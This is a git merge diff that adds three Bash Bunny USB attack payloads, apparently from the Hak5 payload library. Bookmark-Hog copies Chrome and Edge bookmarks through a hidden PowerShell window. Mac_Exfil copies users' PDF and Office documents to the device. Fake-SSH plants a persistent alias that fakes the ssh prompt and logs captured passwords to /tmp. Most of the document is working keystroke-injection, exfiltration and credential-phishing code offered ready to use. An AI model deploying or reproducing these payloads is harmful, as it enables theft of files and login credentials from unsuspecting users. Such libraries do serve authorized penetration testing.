Merge branch 'hak5:master' into master

payloads/library/exfiltration/Bookmark-Hog/BBB.ps1

@@ -0,0 +1,47 @@
+#Bookmark-Hog
+
+# Get Drive Letter
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
+
+# Test if directory exists if not create directory in loot folder to store file
+$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
+$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
+
+if(!(Test-Path -Path $TARGETDIR )){
+    mkdir $TARGETDIR
+}
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
+     try {
+         Write-Host "The chrome bookmark file has not been found. "
+     }
+     catch {
+         throw $_.Exception.Message
+     }
+ }
+ # Copy Chrome Bookmarks to Bash Bunny
+  else {
+     Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR" 
+ }
+
+
+# See if file is a thing
+Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" 
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
+    try {
+        Write-Host "The edge bookmark file has not been found. "
+    }
+    catch {
+        throw $_.Exception.Message
+    }
+}
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" 
+}

payloads/library/exfiltration/Bookmark-Hog/README.md

@@ -0,0 +1,104 @@
+<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Bookmark-Hog
+
+A payload to exfiltrate bookmarks of the 2 most popular browsers
+
+## Description
+
+This payload will enumerate through the browser directories, looking for the file that stores the bookmark history 
+These files will be saved to the bash bunny in the loot directory
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Let the magic happen
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<h2 align="center">📱 My Socials 📱</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
+      </a>
+      <br>YouTube
+    </td>
+    <td align="center" width="96">
+      <a href="https://twitter.com/atomiczsec">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
+      </a>
+      <br>Twitter
+    </td>
+    <td align="center" width="96">
+      <a href="https://discord.gg/MYYER2ZcJF">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>I-Am-Jakoby's Discord
+    </td>
+  </tr>
+</table>
+</div>
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>

payloads/library/exfiltration/Bookmark-Hog/payload.txt

@@ -0,0 +1,22 @@
+# Title:         Bookmark-Hog
+# Description:   This payload is meant to exfiltrate bookmarks to the bash bunny.
+# Author:        atomiczsec
+# Version:       1.0
+# Category:      Exfiltration
+# Attackmodes:   HID, Storage
+# Target:        Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 100
+LED STAGE2
+QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
+QUACK ENTER

payloads/library/exfiltration/Mac_Exfil/payload.txt

@@ -0,0 +1,45 @@
+#!/bin/bash
+
+# Title: Mac_Exfil
+# Description: Exfiltrates files from logged in users Documents and Desktop folders
+# Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
+# Target: macOS
+# Dependencies: none
+#
+# Format your MicroSD XC card for your Bash Bunny Mark II using FAT32 and name it "BUNNY" containing a folder named "loot"
+LED SETUP
+ATTACKMODE HID STORAGE VID_0x05AC PID_0x0267
+QUACK GUI SPACE
+QUACK DELAY 500
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 1000
+LED STAGE1
+QUACK STRING "rsync -av --max-size=5.0m --include='*.pdf' --include='*.docx' --include='*.xlsx' --exclude='*' ~/Documents/ ~/Desktop/ /Volumes/BUNNY/loot"
+QUACK ENTER
+QUACK DELAY 2000
+# Sync filesystem 
+# By default, the Linux kernel writes data to disk asynchronously.
+# Writes are buffered (cached) in memory, and written to the storage device at the optimal time.
+# The sync command forces an immediate write of all cached data to disk.
+# Run sync if you anticipate the system to be unstable, or the storage device to become suddenly unavailable, 
+# and you want to ensure all data is written to disk. (WE ARE ABOUT TO EJECT IT)
+sync
+QUACK DELAY 2000
+LED STAGE2
+QUACK STRING "diskutil eject BUNNY && killall Terminal"
+QUACK ENTER
+QUACK DELAY 1000
+LED STAGE3
+# LED payload complete
+LED W FAST
+mount /dev/mmcblk0p1 /mnt
+files=$(find /mnt/loot -type f | wc -l)
+# debug=$(find /mnt/loot -type f)
+# DEBUG "switch-1-debug" "$files:$debug"
+umount /mnt
+if [ "$files" != "0" ]; then
+LED FINISH
+else
+LED FAIL
+fi

payloads/library/exfiltration/Mac_Exfil/readme.md

@@ -0,0 +1,18 @@
+# Mac_Exfil for the BashBunny
+
+* Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
+* Version: Version 1.0
+* Target: macOS
+
+## Description
+
+A payload that Exfiltrates Word, Excel & PDF files from logged in users Documents and Desktop folders
+
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Purple             | Executing Payload                            |
+| Green              | Successfully grabbed files                   |
+| Red                | Did not get files                            |

payloads/library/phishing/fake-ssh/README.md

@@ -0,0 +1,44 @@
+# Fake SSH
+
+- Title:         Fake SSH
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Phishing
+
+## Description
+
+1) Copies the "ssh" command spoofing program to the user's home directory.
+2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
+3) When the user executes the command "ssh" in a terminal, the spoofing program :
+- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password".
+- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file.
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+```
+
+From "ssh-phishing.sh" change the values of the following constants if necessary :
+```bash
+
+readonly MAXIMUM_ATTEMPTS=3
+
+```
+
+From "ssh-phishing.sh", change the payload if you wish :
+```bash
+##
+# <YOUR-PAYLOAD>
+##
+/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
+##
+# </YOUR-PAYLOAD>
+##
+```

payloads/library/phishing/fake-ssh/payload.txt

@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title:            Fake-SSH
+#
+# Description:      
+#                   This program creates a fake "ssh" 
+#                   command by defining an persistent alias.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.4 LTS x86_64 (Xfce) and OpenSSH_8.2p1
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+Q CTRL-ALT t
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " cp ./ssh-phishing.sh ~/.ssh_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING " chmod +x ~/.ssh_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " printf \"\\nalias ssh='~/.ssh_phishing.sh'\\n\" >> ~/.bash_aliases"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING " exit"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

payloads/library/phishing/fake-ssh/ssh-phishing.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Fake-SSH
+#
+# This program imitates the behavior 
+# of the "ssh" command.
+#
+
+readonly MAXIMUM_ATTEMPTS=3
+
+attempts() {
+    /bin/echo -n "${1}'s password: "
+    read -r -s ssh_password
+    /bin/echo ""
+    /bin/echo "echo \"${ssh_password}\"" > "${SSH_ASKPASS}"
+    if ( /bin/setsid --wait /usr/bin/ssh -o ConnectTimeout=5 -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" "${1}" "exit" > /dev/null 2>&1 ); then
+        ##
+        # <YOUR-PAYLOAD>
+        ##
+        /bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
+        ##
+        # </YOUR-PAYLOAD>
+        ##
+        /bin/setsid --wait /usr/bin/ssh -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" $2 2> /dev/null
+        /bin/rm "${SSH_ASKPASS}"
+        exit 0
+    fi
+    /bin/echo "Permission denied, please try again."
+}
+
+if [ "${#}" -eq 0 ]; then
+    /usr/bin/ssh
+else
+    for destination in "${@}"; do
+        if [[ "${destination}" =~ "@" ]]; then
+            export SSH_ASKPASS="/tmp/.askpass_script.sh"
+            /bin/echo "" > "${SSH_ASKPASS}"
+            chmod +x "${SSH_ASKPASS}"
+            for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
+                attempts "${destination}" "${*}"
+            done
+            /bin/echo "${destination}: Permission denied (publickey,password,keyboard-interactive)."
+            /bin/rm "${SSH_ASKPASS}"
+            exit 0
+        fi
+    done
+    /usr/bin/ssh "${@}"
+fi